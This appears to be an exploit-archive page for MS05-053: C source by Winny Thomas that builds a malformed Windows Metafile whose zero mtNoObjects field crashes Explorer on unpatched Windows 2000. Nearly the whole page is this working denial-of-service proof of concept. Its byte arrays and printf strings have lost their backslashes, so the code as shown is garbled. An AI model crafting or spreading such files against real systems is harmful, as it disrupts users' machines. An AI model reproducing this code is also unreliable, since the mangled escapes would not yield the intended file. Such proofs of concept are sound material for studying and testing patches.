MS Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : MS Windows Metafile (mtNoObjects) Denial of Service Exploit (MS05-053)
# Published : 2005-11-30
# Author : Winny Thomas
# Previous Title : WinEggDropShell 1.7 Multiple PreAuth Remote Stack Overflow PoC
# Next Title : MS Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)
/*
 * Author: Winny Thomas
 *         Pune, INDIA
 *
 * The crafted metafile (WMF) from this code when viewed in explorer crashes it. The issue is seen
 * when the field 'mtNoObjects' in the Metafile header is set to 0x0000.
 * The code was tested on Windows 2000 server SP4. The issue does not occur with the  
 * hotfix for GDI (MS05-053) installed.
 *
 * Disclaimer: This code is for educational/testing purposes by authorized persons on 
 * networks/systems setup for such a purpose. The author of this code shall not bear 
 * any responsibility for any damage caused by using this code. 
 *
 */

#include <stdio.h>

unsigned char wmfheader[] = 
"xd7xcdxc6x9ax00x00xc6xfbxcax02xaax02x39x09xe8x03"
"x00x00x00x00x66xa6"
"x01x00"	   //mtType	
"x09x00"	   //mtHeaderSize
"x00x03"	   //mtVersion
"xffxffxffx7f" //mtSize
"x00x00"	   //mtNoObjects 
"xffxffxffxff" //mtMaxRecord
"x00x00";

unsigned char metafileRECORD[] = 
"x05x00x00x00x0bx02x39x09xc6xfbx05x00x00x00x0cx02"
"x91xf9xe4x06x04x00x00x00x06x01x01x00x07x00x00x00"
"xfcx02x00x00x0ex0dx0dx00x00x00x04x00x00x00x2dx01"
"x00x00x08x00x00x00xfax02"
"x05x00x00x00x00x00xffxffxffx00x04x00x00x00x2dx01"
"x01x00x04x00x00x00x06x01x01x00x14x00x00x00x24x03"
"x08x00xc6xfbxcax02xbcxfexcax02x0fx01x49x06xa5x02"
"x49x06xf4x00x68x08xd5xfcx65x06x86xfex65x06xc6xfb"
"xcax02x08x00x00x00xfax02x00x00x00x00x00x00x00x00"
"x00x00x04x00x00x00x2dx01x02x00x07x00x00x00xfcx02"
"x00x00xffxffxffx00x00x00x04x00x00x00x2dx01x03x00"
"x04x00x00x00xf0x01x00x00x07x00x00x00xfcx02x00x00"
"xbdx34x30x00x00x00x04x00x00x00x2dx01x00x00x04x00"
"x00x00x2dx01x01x00x04x00x00x00x06x01x01x00x0ex00"
"x00x00x24x03x05x00xd5xfcx36x07xdaxfcxd1x06x8bxfe"
"xd1x06x86xfex36x07xd5xfcx36x07x04x00x00x00x2dx01"
"x02x00x04x00x00x00x2dx01x03x00x04x00x00x00xf0x01"
"x00x00x07x00x00x00xfcx02x00x00xbdx34x30x00x00x00"
"x04x00x00x00x2dx01x00x00x04x00x00x00x2dx01x01x00"
"x04x00x00x00x06x01x01x00x0ex00x00x00x24x03x05x00"
"xc6xfbx9bx03xcbxfbx36x03xc1xfex36x03xbcxfex9bx03"
"xc6xfbx9bx03x04x00x00x00x2dx01x02x00x04x00x00x00"
"x2dx01x03x00x04x00x00x00xf0x01x00x00x07x00x00x00"
"xfcx02x00x00xfbx4ex55x00x00x00x04x00x00x00x2dx01"
"x00x00x04x00x00x00x2dx01x01x00x04x00x00x00x06x01"
"x01x00x0ex00x00x00x24x03x05x00xbcxfex9bx03xc1xfe"
"x36x03x14x01xb5x06x0fx01x1ax07xbcxfex9bx03x04x00"
"x00x00x2dx01x02x00x04x00x00x00x2dx01x03x00x04x00"
"x00x00xf0x01x00x00x07x00x00x00xfcx02x00x00xbdx34"
"x30x00x00x00x04x00x00x00x2dx01x00x00x04x00x00x00"
"x2dx01x01x00x04x00x00x00x06x01x01x00x0ex00x00x00"
"x24x03x05x00x0fx01x1ax07x14x01xb5x06xaax02xb5x06"
"xa5x02x1ax07x0fx01x1ax07x04x00x00x00x2dx01x02x00"
"x04x00x00x00x2dx01x03x00x04x00x00x00xf0x01x00x00"
"x07x00x00x00xfcx02x00x00xfax94x93x00x00x00x04x00"
"x00x00x2dx01x00x00x04x00x00x00x2dx01x01x00x04x00"
"x00x00x06x01x01x00x14x00x00x00x24x03x08x00xc6xfb"
"x9bx03xbcxfex9bx03x0fx01x1ax07xa5x02x1ax07xf4x00"
"x39x09xd5xfcx36x07x86xfex36x07xc6xfbx9bx03x04x00"
"x00x00x2dx01x02x00x04x00x00x00x2dx01x03x00x04x00"
"x00x00xf0x01x00x00x03x00";

unsigned char wmfeof[] = 
"x00x00x00x00";

int main(int argc, char *argv[])
{
	FILE *fp;
	int metafilesizeW, recordsizeW;
	char wmfbuf[2048];
	int metafilesize, recordsize, i, j;
	
	metafilesize = sizeof (wmfheader) + sizeof (metafileRECORD) + sizeof(wmfeof) -3;
	metafilesizeW = metafilesize/2;
	recordsize = sizeof (metafileRECORD) -1;
	recordsizeW = recordsize/2;
	
	memcpy((unsigned long *)&wmfheader[28], &metafilesize, 4);
	memcpy((unsigned long *)&wmfheader[34], &recordsizeW, 4);

	printf("[*] Adding Metafile headern");
	for (i = 0; i < sizeof(wmfheader) -1; i++) {
		(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
	}
			
	printf("[*] Adding metafile recordsn");
	for (j = i, i = 0; i < sizeof(metafileRECORD) -1; i++, j++) {
		wmfbuf[j] = metafileRECORD[i];
	}
	
	printf("[*] Setting EOFn");
	for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
		wmfbuf[j] = wmfeof[i];
	}

	printf("[*] Creating Metafile (MS053.wmf)n");
	fp = fopen("MS053.wmf", "wb");
	fwrite(wmfbuf, 1, metafilesize, fp);
	fclose(fp);
}

// www.Syue.com [2005-11-30]